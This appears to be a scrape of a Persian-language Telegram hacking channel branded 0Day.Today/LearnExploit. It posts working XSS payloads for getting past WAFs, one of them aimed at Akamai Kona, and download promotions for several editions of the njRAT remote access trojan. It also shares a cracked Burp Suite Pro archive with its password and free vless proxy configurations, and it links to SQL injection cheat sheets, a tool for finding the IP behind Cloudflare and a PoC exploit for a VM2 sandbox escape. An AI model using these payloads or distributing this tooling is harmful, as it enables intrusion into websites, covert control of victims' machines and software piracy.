Akamai Kona WAF
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤4👍4⚡3🔥1
vless://733297c1-5be1-4595-92c3-d49f8e69a867@s.thisisforu.sbs:43978?alpn=#GR_SV5_MCI_MTN-Telegram%20channel%20%253A%20%2540LearnExploit
بزنید حال کنید بمولا 🔥
20 گیگ زدم تموم شد بازم میفرستم براتون
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥8👍3
telegram phone number checker - This script lets you check whether a specific phone number is connected to a Telegram account.
Github
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - bellingcat/telegram-phone-number-checker: Check if phone numbers are connected to Telegram accounts.
Check if phone numbers are connected to Telegram accounts. - bellingcat/telegram-phone-number-checker
❤🔥3⚡2👍1
🌟 njRAT 🌟
📝
NjRAT is a Remote Administration Tool. This repository contains a Njrat Editions.
Use it on virtual machine
⬇️ Download (NjRat 0.7D Danger Edition)
⬇️ Download (NjRat 0.7D Golden Edition)
⬇️ Download (NjRat 0.7D Green Edition)
⬇️ Download (NjRat 0.7D)
⬇️ Download (njRAT Lime Edition )
⬇️ Download (ALL Version)
🐈⬛ Github
BugCod3
#njRAT #Tools
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
📝
NjRAT is a Remote Administration Tool. This repository contains a Njrat Editions.
Use it on virtual machine
⬇️ Download (NjRat 0.7D Danger Edition)
⬇️ Download (NjRat 0.7D Golden Edition)
⬇️ Download (NjRat 0.7D Green Edition)
⬇️ Download (NjRat 0.7D)
⬇️ Download (njRAT Lime Edition )
⬇️ Download (ALL Version)
🐈⬛ Github
BugCod3
#njRAT #Tools
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit 📢 T.me/Tech_Army
👍5❤1🔥1
An Akamai WAF bypass payload
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3👍1
A payload to bypass WAF
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4
AllAboutBugBounty - All about bug bounty (bypasses, payloads, and etc)
Github
#Xss #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Xss #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - daffainfo/AllAboutBugBounty: All about bug bounty (bypasses, payloads, and etc)
All about bug bounty (bypasses, payloads, and etc) - daffainfo/AllAboutBugBounty
❤3👍2🆒1
جدید ترین نسخه کالی 2023.4 منتشر شد .
➕ Cloud ARM64 - Now marketplaces on Amazon AWS and Microsoft Azure have ARM64 option
➕ Vagrant Hyper-V - Our Vagrant offering now supports Hyper-V
➕ Raspberry Pi 5 - Kali on the latest Raspberry Pi foundation device
➕ GNOME 45 - Kali theme is on the latest versions
➕ Internal Infrastructure - Peak at what is going on behind the scenes with mirrorbits
➕ New Tools - As always, various new & updated packages
kali
#kali
——————
0Day.Today
@LearnExploit
@Tech_Army
➕ Cloud ARM64 - Now marketplaces on Amazon AWS and Microsoft Azure have ARM64 option
➕ Vagrant Hyper-V - Our Vagrant offering now supports Hyper-V
➕ Raspberry Pi 5 - Kali on the latest Raspberry Pi foundation device
➕ GNOME 45 - Kali theme is on the latest versions
➕ Internal Infrastructure - Peak at what is going on behind the scenes with mirrorbits
➕ New Tools - As always, various new & updated packages
kali
#kali
——————
0Day.Today
@LearnExploit
@Tech_Army
👍4🔥2
0Day.Today | Learn Exploit | Zero World | Dark web |
جدید ترین نسخه کالی 2023.4 منتشر شد . ➕ Cloud ARM64 - Now marketplaces on Amazon AWS and Microsoft Azure have ARM64 option ➕ Vagrant Hyper-V - Our Vagrant offering now supports Hyper-V ➕ Raspberry Pi 5 - Kali on the latest Raspberry Pi foundation…
در صورتی که از کالی لینوکس قدیمی تر استفاده می کنید می تونید به صورت دستی اون رو به آخرین نسخه منتشر شده آپدیت کنید . ترمینال رو باز کنید و دستورات زیر رو وارد کنید .
#kali
——————
0Day.Today
@LearnExploit
@Tech_Army
┌──(LearnExploit㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware" | sudo tee /etc/apt/sources.list
[...]
┌──(LearnExploit㉿kali)-[~]
└─$ sudo apt update && sudo apt -y full-upgrade
[...]
┌──(LearnExploit㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~/
[...]
┌──(LearnExploit㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] && sudo reboot -f
#kali
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥7👍2
Advanced SQL Injection Cheatsheet - A cheat sheet that contains advanced queries for SQL Injection of all types
Github
#SQL
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#SQL
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - kleiton0x00/Advanced-SQL-Injection-Cheatsheet: A cheat sheet that contains advanced queries for SQL Injection of all types.
A cheat sheet that contains advanced queries for SQL Injection of all types. - kleiton0x00/Advanced-SQL-Injection-Cheatsheet
❤6
vless://6d5278db-dec0-4157-ac95-2149910022fe@s.thisisforu.sbs:43978?type=tcp&security=none#
LearnExploit
آقا اینم بزنین عشق کنین ❤️🔥
۵۰ گیگه
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2👍1
Honeypots Detection 🐝
Nuclei templates for honeypots detection. 🍯
Github
#honeypot #nuclei
——————
0Day.Today
@LearnExploit
@Tech_Army
Nuclei templates for honeypots detection. 🍯
Github
#honeypot #nuclei
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5❤🔥1
burpsuite_pro_v2023.11.1.2.zip
680.3 MB
Burp Suite Version 2023.11.1.2
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت . *
Pass : 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت . *
Pass : 311138
#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥6👍1
به دست آوردن ip پشت cloudflare با ابزار CloakQuest3r
Github
#tools #cloudflare #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#tools #cloudflare #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡19👍5🔥3
CVE-2023-30547 - PoC Exploit for VM2 Sandbox Escape Vulnerability
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - rvizx/CVE-2023-30547: PoC Exploit for VM2 Sandbox Escape Vulnerability
PoC Exploit for VM2 Sandbox Escape Vulnerability. Contribute to rvizx/CVE-2023-30547 development by creating an account on GitHub.
❤🔥3❤1